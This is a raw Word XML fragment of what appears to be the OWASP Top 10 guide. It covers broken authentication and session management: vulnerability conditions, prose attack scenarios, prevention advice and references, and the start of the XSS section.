          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1807AE3B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5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000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Session IDs don’t timeout, or user sessions or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B3C7A6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authentication tokens, particularly single sign-on  (SSO)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FF30AE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tokens, aren’t properly invalidated during logout.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FB42F9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6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000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Session IDs aren’t rotated after successful login.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A453A67" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="26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7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000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Passwords, session IDs, and other credentials are sent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDE4E99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000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>over unencrypted connections. See A6.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4779FA81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ee the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ASVS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> requirement areas V2 and V3 for more details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8C062C" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FD5A19E" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="431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Example Attack Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A63038" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="251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Scenario #1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>: Airline reservations application supports URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F94BE12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rewriting, putting session IDs in the URL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584C7767" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="300" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="89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http://example.com/sale/saleitems</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>;jsessionid=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088D9379" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="199" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="89"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>2P0OC2JSNDLPSKHCJUN2JV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?dest=Hawaii</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5F2F65" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="30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n authenticated user of the site wants to let his friends</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AA167F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know about the sale. He e-mails the above link without</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482DFA0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knowing he is also giving away his session ID. When his</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DE9E90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friends use the link they will use his session and credit card.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4575CBFC" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="30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Scenario #2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>: Application’s timeouts aren’t set properly. User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531F5BEF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uses a public computer to access site. Instead of selecting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7516D469" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="20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“logout” the user simply closes the browser tab and walks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DFB244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way. Attacker uses the same browser an hour later, and that</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC68065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browser is still authenticated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7938642D" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="30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Scenario #3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>: Insider or external attacker gains access to the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0368091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ystem’s password database. User passwords are not</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49324D44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properly hashed, exposing every users’ password to the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CAF83B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lastRenderedPageBreak/>
        <w:t>attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA1B0B2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58047E85" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F7696B3" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43801776" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2410D9D1" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3580F97F" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FF05D6C" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="333CBB5F" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BECFBC3" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D832FED" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CD24088" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29028C68" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61D133F1" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31C28D4D" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FB39A44" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7831EDA1" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E762BE8" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="067F24D9" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="413" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56B549D6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How Do I Prevent This?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DE68A5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000000"/>
          <w:w w:val="94"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>The primary recommendation for an organization is to make</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06612383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vailable to developers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579C1A73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000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>1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A single set of strong authentication and session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAFA105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b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>management controls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>. Such controls should strive to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC0FE3A" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="322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a)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000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>meet all the authentication and session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE5E6DD" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="199" w:lineRule="exact"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>management requirements defined in OWASP’s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD6866D" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="199" w:lineRule="exact"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:hyperlink r:id="rId172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pplication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73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74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erification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7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tandard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(ASVS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EFCAC7" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="202" w:lineRule="exact"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>areas V2 (Authentication) and V3 (Session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24432390" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="199" w:lineRule="exact"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Management).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB81B09" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="319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b)     have a simple interface for developers. Consider the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F20C4D" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="202" w:lineRule="exact"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:hyperlink r:id="rId176" w:history="1">
        <w:r w:rsidR="00810992"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ESAPI</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00810992">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="93"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId177" w:history="1">
        <w:r w:rsidR="00810992"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Authenticator</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00810992">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="93"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId178" w:history="1">
        <w:r w:rsidR="00810992"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and</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00810992">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="93"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId179" w:history="1">
        <w:r w:rsidR="00810992"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User</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00810992">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="93"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId180" w:history="1">
        <w:r w:rsidR="00810992"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APIs</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00810992">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="93"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> as good examples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCEAC41" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="199" w:lineRule="exact"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>to emulate, use, or build upon.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B321FE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2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000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Strong efforts should also be made to avoid XSS flaws</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2BC1B9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000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>which can be used to steal session IDs. See A3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B3B5BE" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63500433" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FBE11FD" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09C4DB40" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="350" w:lineRule="exact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References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601BCC89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000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>OWASP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25829D01" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="311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For a more complete set of requirements and problems to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECE0529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void in this area, see the </w:t>
      </w:r>
      <w:hyperlink r:id="rId18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SV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8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quirement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8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ea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8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</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="60A8A88B" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="199" w:lineRule="exact"/>
      </w:pPr>
      <w:hyperlink r:id="rId185" w:history="1">
        <w:proofErr w:type="gramStart"/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uthentication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86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2)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87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nd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88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ssion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89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anagement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0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3)</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId191" w:history="1">
        <w:r w:rsidR="00810992"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.</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4156D49B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uthentic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3B271EAB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go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asswor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19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66D05039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ss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anagemen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60A28D32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evelopmen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0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uthentication</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="570FA5FB" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="320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uthentication</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0E5F80D4" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="329" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>External</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DDF50D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1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287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mprop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uthentication</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5E0E9165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000000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384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ss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2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ixation</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6FECA6D5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64C92832" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="9"/>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="1417F8E2" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2304"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="970" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="0172A71D">
          <v:shape id="_x0000_s2665" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-1pt;margin-top:74.3pt;width:570pt;height:229.75pt;z-index:251650560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27C30676" w14:textId="77777777" w:rsidTr="00F13059">
                    <w:trPr>
                      <w:trHeight w:hRule="exact" w:val="1022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4AA89CE4" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="775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4197BF81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759A882F" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="499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4467687D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4E204F2A" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="509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4889CA3C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692040AD" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="551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155E27BC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58270693" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="497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6C3426D7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40AEBEF9" w14:textId="77777777" w:rsidTr="00F13059">
                    <w:trPr>
                      <w:trHeight w:hRule="exact" w:val="629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FDB962F" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="433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261D878E" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="312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55E61D70" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="241" w:lineRule="exact"/>
                          <w:ind w:left="50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FF"/>
                        <w:tcMar>
                          <w:left w:w="0" w:type="dxa"/>
                          <w:right w:w="0" w:type="dxa"/>
                        </w:tcMar>
                      </w:tcPr>
                      <w:p w14:paraId="78043D22" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="312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55AA2D52" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="241" w:lineRule="exact"/>
                          <w:ind w:left="10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VERY WIDESPREA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7C99993F" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="312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2B990CC2" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="241" w:lineRule="exact"/>
                          <w:ind w:left="69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298B4685" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="312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5F1D2033" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="241" w:lineRule="exact"/>
                          <w:ind w:left="42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B693418" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="312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0E006852" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="241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6BE6305B" w14:textId="77777777" w:rsidTr="00F13059">
                    <w:trPr>
                      <w:trHeight w:hRule="exact" w:val="234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AE11E3E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one</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="7951E472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d</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="55B5E4E5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trus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3E1B0C38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,</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="2EB090D1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ternal</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="46B07EE9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rnal</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="7C019A71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</w:p>
                      <w:p w14:paraId="648ECD2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dministrator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561EF05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d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xt-</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="291B6B15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as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cripts</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="1BE7DD6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lo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29263514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rpret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39CF06A0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most</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="563DF11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urc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</w:p>
                      <w:p w14:paraId="21576F81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</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="325D6169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ecto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ing</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="436EBFC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r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urces</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="0AC10054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om</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="29365CB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base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590069E" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="274" w:lineRule="exact"/>
                          <w:ind w:left="73"/>
                        </w:pPr>
                        <w:hyperlink r:id="rId230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A6331"/>
                              <w:w w:val="98"/>
                              <w:sz w:val="19"/>
                            </w:rPr>
                            <w:t>XSS</w:t>
                          </w:r>
                        </w:hyperlink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st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evalent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</w:p>
                      <w:p w14:paraId="215A93F9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curit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X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cc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</w:p>
                      <w:p w14:paraId="2AEB704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ppli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</w:p>
                      <w:p w14:paraId="253E3B51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ithout</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="5F7653C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per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ida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scap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</w:p>
                      <w:p w14:paraId="597848A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tent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re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now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yp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76888004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X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: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1)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  <w:u w:val="single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A6331"/>
                            <w:w w:val="98"/>
                            <w:sz w:val="19"/>
                            <w:u w:val="single"/>
                          </w:rPr>
                          <w:t>Stor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2)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  <w:u w:val="single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A6331"/>
                            <w:w w:val="98"/>
                            <w:sz w:val="19"/>
                            <w:u w:val="single"/>
